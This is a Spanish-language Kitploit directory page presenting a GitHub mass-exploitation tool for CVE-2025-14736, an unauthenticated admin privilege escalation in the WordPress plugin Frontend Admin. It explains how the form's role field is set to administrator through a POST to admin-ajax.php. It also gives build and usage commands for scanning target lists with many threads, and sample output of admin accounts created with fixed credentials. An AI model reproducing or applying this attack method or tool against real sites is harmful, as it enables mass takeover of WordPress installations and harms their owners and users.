Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-14736 — Escalación de privilegios no autenticada a Administrador mediante el campo de formulario de rol | Kitploit
Herramientas/GitHubGitHub/hyunchiya/cve-2025-14736
Escalada de PrivilegiosAtaques de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubhyunchiya/cve-2025-14736

CVE-2025-14736

Escalación de privilegios no autenticada a Administrador mediante el campo de formulario de rol

Ver Repositorio
hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-14736

Frontend Admin by DynamiApps - Escalada de Privilegios sin Autenticación

Autor: Hyun Chiya


Información de la Vulnerabilidad

CampoValor
CVE IDCVE-2025-14736
PluginFrontend Admin by DynamiApps
Versiones Afectadas<= 3.28.25
Tipo de VulnerabilidadEscalada de Privilegios sin Autenticación
GravedadCrítica

Descripción

El plugin Frontend Admin para WordPress es vulnerable a una escalada de privilegios sin autenticación debido a una validación insuficiente en los campos controlados por el usuario durante el registro. Los atacantes pueden inyectar roles arbitrarios, incluido administrator, manipulando el payload de envío del formulario.

Análisis de Causa Raíz

La lógica vulnerable reside en el manejo de los envíos de formularios donde el campo role se confía en la entrada del usuario sin verificar si el usuario está autorizado para asignar ese rol. Específicamente, el campo acff[user][field_user_role_ID] puede ser modificado a administrator.

Flujo de Explotación

root@kitploit:~
flowchart TD
    A["Attacker visits Registration Page"] --> B["Extract Nonce (_acf_nonce) & Form ID (_acf_form)"]
    B --> C["Construct POST payload with 'role'='administrator'"]
    C --> D["POST to /wp-admin/admin-ajax.php"]
    D --> E{"Verification"}
    E -->|Success| F["New Admin User Created"]
    
    style F fill:#ff6b6b,stroke:#c92a2a,color:#fff

Requisitos Previos

  1. El objetivo tiene instalado el plugin "Frontend Admin" (versión vulnerable).
  2. Un formulario de registro frontend está habilitado y accesible.

Compilación

root@kitploit:~
go build -o mass_exploit.exe mass_exploit.go

Uso

Escaneo Masivo y Explotación

root@kitploit:~
.\mass_exploit.exe -l list.txt -t 50

Opciones

ArgumentoDescripción
-lRuta a la lista de URLs objetivo (por defecto: list.txt)
-tNúmero de hilos concurrentes (por defecto: 10)
-timeoutTiempo de espera de solicitud en segundos (por defecto: 15)

Ejemplo de Salida

root@kitploit:~
>> [ ONLINE ]    
    ╔═══════════════════════════════════════════════════════════════════════════════════════╗
    ║   CVE-2025-14736 - Mass Exploit Tool                                                  ║
    ║   Frontend Admin by DynamiApps Privilege Escalation                                   ║
    ║   Author: Hyun Chiya                                                                  ║
    ╚═══════════════════════════════════════════════════════════════════════════════════════╝

>> [ INFORMATION ]
[*] Loaded 500 targets. Starting scan with 50 threads...

[SUCCESS] http://target.com | User: hacker_mass | Pass: Password123! | FormID: 48
[SUCCESS] http://example.org | User: hacker_mass | Pass: Password123! | FormID: 32

[*] Scan complete.

Descargo de Responsabilidad

Esta herramienta se proporciona solo con fines educativos y de pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal. Úsela con responsabilidad.

Autor

Hyun Chiya

Descargar herramienta